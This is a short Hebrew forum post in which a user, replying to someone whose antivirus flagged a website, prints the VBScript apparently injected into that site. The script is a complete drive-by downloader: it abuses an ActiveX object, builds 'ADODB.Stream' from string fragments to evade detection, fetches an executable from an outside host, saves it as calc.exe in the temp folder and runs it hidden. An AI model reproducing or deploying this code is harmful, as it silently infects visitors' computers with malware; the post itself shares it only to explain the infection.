ציטוט:
נכתב במקור על ידי FreshServ.Net
כשנכנסתי לאתר, האנטיוירוס התריע על וירוס...
|
הם הכניסו קוד של VB לאתר כנראה בגלל זה, הינה הקוד:
HTML קוד:
2
3on error resume next
4
5
6
7' due to how ajax works, the file MUST be within the same local domain
8dl = "http://members.lycos.co.uk/uniix/goo.exe"
9
10' create adodbstream object
11Set df = document.createElement("object")
12df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
13str="Microsoft.XMLHTTP"
14Set x = df.CreateObject(str,"")
15
16a1="Ado"
17a2="db."
18a3="Str"
19a4="eam"
20str1=a1&a2&a3&a4
21str5=str1
22set S = df.createobject(str5,"")
23S.type = 1
24
25' xml ajax req
26str6="GET"
27x.Open str6, dl, False
28x.Send
29
30' Get temp directory and create our destination name
31fname1="calc.exe"
32set F = df.createobject("Scripting.FileSystemObject","")
33set tmp = F.GetSpecialFolder(2) ' Get tmp folder
34fname1= F.BuildPath(tmp,fname1)
35S.open
36' open adodb stream and write contents of request to file
37' like vbs dl+exec code
38S.write x.responseBody
39' Saves it with CreateOverwrite flag
40S.savetofile fname1,2
41
42S.close
43set Q = df.createobject("Shell.Application","")
44Q.ShellExecute fname1,"","","open",0